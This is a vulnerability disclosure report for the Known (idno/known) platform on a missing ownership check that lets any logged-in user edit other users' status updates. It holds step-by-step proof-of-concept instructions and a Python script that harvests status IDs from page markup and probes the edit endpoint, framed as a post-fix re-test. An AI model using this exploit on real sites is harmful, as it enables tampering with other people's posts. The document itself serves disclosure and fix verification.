Improper Access Control in idno/known

Valid

Reported on

Apr 18th 2021


✍️ Description

Any logged-in user can edit the 'Public' or 'Members only' status updates of other users: the status edit page verifies that the requester is authenticated, but not that the requester owns the post.

🕵️‍♂️ Proof of Concept

  1. Create a 'Public' or 'Members only' status update with a first user.
  2. Log in with a second user and go to the root page (e.g. http://yoursite/known), where the first user's status is visible.
  3. Open the browser developer tools (F12) and search the inspector for "textarea"; the JSON payload of the 'like' action for that status looks like:
     <textarea name="json">{"type":"like","object":"http:\/\/yoursite\/known\/view\/8cd76fb1-86de-43e2-a4b3-ef802f94ee10"}</textarea>
  4. Take the identifier of the status, i.e. the UUID at the end of the object URL; here it is "8cd76fb1-86de-43e2-a4b3-ef802f94ee10".
  5. Still logged in as the second user, go to http://yoursite/known/status/edit/8cd76fb1-86de-43e2-a4b3-ef802f94ee10: the edit form for the first user's status is served and the post can be modified.
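The five steps above, automated as a re-test that can be run after a fix lands. This is an added example, not code from the report or from the Known project. It takes the URL layout (`/view/<uuid>` in the like payload, `/status/edit/<uuid>` for the edit page) from the report; the HTTP client is injected so the script runs offline against constructed responses, the "editable" heuristic (HTTP 200 carrying a form that posts back to the edit URL) is an assumption about Known's markup, and the 403 for a patched server is an assumed response, not observed behaviour.

```python
import json
import re
from html.parser import HTMLParser
from typing import Callable, Dict, List, NamedTuple, Tuple

# Assumed URL layout, taken from the report: the like payload leaks the status
# URL as .../view/<uuid>, and the edit page lives at .../status/edit/<uuid>.
BASE = "http://yoursite/known"
UUID_RE = re.compile(
    r"/view/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$"
)
Response = Tuple[int, str]  # (HTTP status code, body)


class _LikeFormParser(HTMLParser):
    """Collects the text of every <textarea name="json"> on the page."""

    def __init__(self) -> None:
        super().__init__()
        self._in_json = False
        self.payloads: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "textarea" and dict(attrs).get("name") == "json":
            self._in_json = True
            self.payloads.append("")

    def handle_endtag(self, tag):
        if tag == "textarea":
            self._in_json = False

    def handle_data(self, data):
        if self._in_json:
            self.payloads[-1] += data


def status_ids_from_root(html: str) -> List[str]:
    """Steps 3-4 of the PoC: pull every status UUID out of the like payloads."""
    parser = _LikeFormParser()
    parser.feed(html)
    ids: List[str] = []
    for raw in parser.payloads:
        try:
            payload = json.loads(raw)  # json.loads turns the "\/" escapes back into "/"
        except json.JSONDecodeError:
            continue
        match = UUID_RE.search(payload.get("object", ""))
        if payload.get("type") == "like" and match:
            ids.append(match.group(1))
    return ids


class Probe(NamedTuple):
    status_id: str
    http_status: int
    editable: bool


def probe_edit(ids: List[str], fetch: Callable[[str], Response]) -> List[Probe]:
    """Step 5 of the PoC for every harvested id. `fetch` must send requests with
    the *second* user's session. The 'editable' heuristic (HTTP 200 plus a form
    that posts back to the edit URL) is an assumption about Known's markup."""
    results: List[Probe] = []
    for sid in ids:
        url = f"{BASE}/status/edit/{sid}"
        code, body = fetch(url)
        editable = code == 200 and "<form" in body and url in body
        results.append(Probe(sid, code, editable))
    return results


def fake_fetch(responses: Dict[str, Response]) -> Callable[[str], Response]:
    """Offline stand-in for an HTTP client holding the second user's cookie."""
    return lambda url: responses.get(url, (404, ""))


# --- constructed sample data (not captured from a real Known install) ---------
SID = "8cd76fb1-86de-43e2-a4b3-ef802f94ee10"  # the identifier quoted in the report
ROOT_HTML = (
    '<div class="post"><p>Status posted by the first user</p>'
    '<textarea name="json">{"type":"like","object":'
    '"http:\\/\\/yoursite\\/known\\/view\\/' + SID + '"}</textarea></div>'
)
EDIT_URL = f"{BASE}/status/edit/{SID}"
# Unpatched behaviour described in the report: the second user gets the edit form.
VULNERABLE_SERVER = {EDIT_URL: (200, f'<form method="post" action="{EDIT_URL}">'
                                     '<textarea name="body">...</textarea></form>')}
# Assumed behaviour once ownership is enforced: the edit page is refused.
FIXED_SERVER = {EDIT_URL: (403, "You do not have permission to edit this post.")}


def run_poc(responses: Dict[str, Response]) -> List[Probe]:
    """Chain both stages of the PoC against a given server behaviour."""
    return probe_edit(status_ids_from_root(ROOT_HTML), fake_fetch(responses))


if __name__ == "__main__":
    for label, server in (("vulnerable", VULNERABLE_SERVER), ("fixed", FIXED_SERVER)):
        for probe in run_poc(server):
            print(f"{label}: {probe.status_id} -> HTTP {probe.http_status}, "
                  f"editable={probe.editable}")
```

Against a real install, replace `fake_fetch` with a client that carries the second user's session cookie; any probe that comes back `editable=True` for a status the second user did not author reproduces the report.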

💥 Impact

Any logged-in user can modify the status updates of any other user, whether they were posted as 'Public' or 'Members only'; the only requirement is knowing the status identifier, which the root page exposes to every logged-in user.

Ben Werdmuller
2 years ago

Maintainer


Thank you for this! Fix is in the works.
